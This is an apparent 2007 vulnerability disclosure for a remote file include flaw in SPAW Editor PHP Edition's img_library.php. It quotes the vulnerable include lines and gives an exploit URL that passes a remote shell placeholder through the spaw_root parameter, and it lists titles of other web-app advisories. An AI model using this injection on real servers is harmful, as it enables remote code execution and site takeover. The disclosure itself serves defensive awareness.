Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) vBulletin v3.6.5 admincp/index.php ( rss feed ) xss vuln. Mani Admin Plugin Stats Reader V1.2 rfi :) WB News Remote File Include in all versions aWebNews v 1.1=>RFI From:RaeD Hasadya <raed_(at)_bsdmail.com> Date:02.03.2007Subject:SPAW Editor PHP EditionRemote IInclude File : SPAW Editor PHP Edition upgrade version 1.2.3 to 1.2.4 Discovered By : Hasadya Raed Contact Me : RaeD[at]BsdMail[dot]Com Download Script: http://heanet.dl.sourceforge.net/sourceforge/spaw/spaw-php-123-to-124.zip B.File :img_library.php : include $spaw_root.'class/util.class.php'; include $spaw_root.'class/lang.class.php'; =*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*= Expl:-http://www.victim.com/spaw/dialogs/img_library.php?spaw_root=[Shell-AttacK] By Hasadya Raed -- _______________________________________________ Get your free email from http://bsdmail.com
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
vBulletin v3.6.5 admincp/index.php ( rss feed ) xss vuln.
Mani Admin Plugin Stats Reader V1.2 rfi :)
WB News Remote File Include in all versions
aWebNews v 1.1=>RFI
